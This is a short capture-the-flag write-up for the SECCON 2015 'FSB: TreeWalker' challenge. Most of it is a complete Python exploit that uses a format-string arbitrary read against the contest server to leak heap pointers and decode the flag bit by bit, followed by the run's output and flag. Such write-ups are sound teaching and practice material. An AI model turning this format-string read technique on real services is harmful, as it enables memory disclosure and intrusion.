A problem I really enjoyed! The explanation is left to the IDA Hex-Rays output below (the binary kindly prints the address of the head of the tree).
The analysis itself was easy, but during the qualifiers Sungwoo hyung wrote the exploit for us and I just watched from the side.
So when I went to get the flag again myself it took a little while because of the FSB.
```python
# Seccon 2015 Quals - Exploit FSB:TreeWalker 200pts Solves:51
# github.com/SECCON/SECCON2015_online_CTF/tree/master/Exploit/200_FSB:%20TreeWalker
# FSB Leak task :)
#
# Python 2. connst() is the author's own socket helper (err0rless module);
# it returns a connected socket s (t is unused here).
from err0rless import connst
from struct import pack, unpack

s, t = connst("treewalker.pwn.seccon.jp", 20000)


def leak(addr):
    # Format-string read: 20 "%p" conversions consume the varargs up to the
    # point where printf is reading arguments out of our own buffer, then
    # "%s" dereferences the 8-byte address appended below and prints the
    # bytes stored there. The address ends up at offset 48 of the buffer.
    p = "%p" * 20  # p = "%llx" * 30
    p += "%s"
    p += "mmark\x00"  # marker: the leaked bytes end right before it, NUL stops printf
    p += pack("Q", addr)
    p += '\x00' * (0x512 - len(p))
    s.send(pack("q", 0x512))  # the service reads an 8-byte length first
    s.send(p)
    # The reply ends with "<leaked bytes>mmark": take the 4 bytes before the
    # marker. "%s" stops at the first NUL, so a value with a 0x00 in its low
    # four bytes would come back shorter than this slice expects; the heap
    # addresses seen here (0x174dxxx / 0x174exxx) never contain one.
    return s.recv(1024)[-9:-5]


def main():
    # The service prints the address of the head node on connect.
    tree = int(s.recv(1024), 16)
    print "TREE : " + hex(tree)
    if tree < 0x01000000: return 0  # bogus leak, give up on this run
    byte = ""
    flag = ""
    while byte != "}":
        byte = ""
        for i in range(8):
            # Nodes are 0x20 bytes each and allocated back to back. If the
            # pointer stored at node+8 points at the very next node the bit
            # is 1, otherwise 0. Heap addresses fit in 32 bits here, so
            # comparing the low dword is enough.
            buf = unpack("I", leak(tree + 8))[0]
            if buf == (tree + 0x20):
                byte += '1'
                print '1',
            else:
                byte += '0'
                print '0',
            tree = tree + 0x20
        byte = chr(int(byte, 2))  # 8 bits, MSB first, form one flag byte
        flag += byte
        print byte
    print flag


if __name__ == "__main__":
    main()

"""
TREE : 0x174d010
0 1 0 1 0 0 1 1 S
0 1 0 0 0 1 0 1 E
0 1 0 0 0 0 1 1 C
0 1 0 0 0 0 1 1 C
0 1 0 0 1 1 1 1 O
0 1 0 0 1 1 1 0 N
0 1 1 1 1 0 1 1 {
0 0 1 1 0 1 0 0 4
0 1 1 1 0 0 1 0 r
0 1 1 0 0 0 1 0 b
0 0 1 1 0 0 0 1 1
0 0 1 1 0 1 1 1 7
0 1 0 1 0 0 1 0 R
0 1 0 0 0 0 0 0 @
0 1 1 1 0 0 1 0 r
0 1 0 1 1 0 0 1 Y
0 1 0 1 0 0 1 0 R
0 1 1 0 0 1 0 1 e
0 1 0 0 0 0 0 1 A
0 1 1 0 0 1 0 0 d
0 1 1 1 1 1 0 1 }
SECCON{4rb17R@rYReAd}
[Finished in 28.0s]
"""
```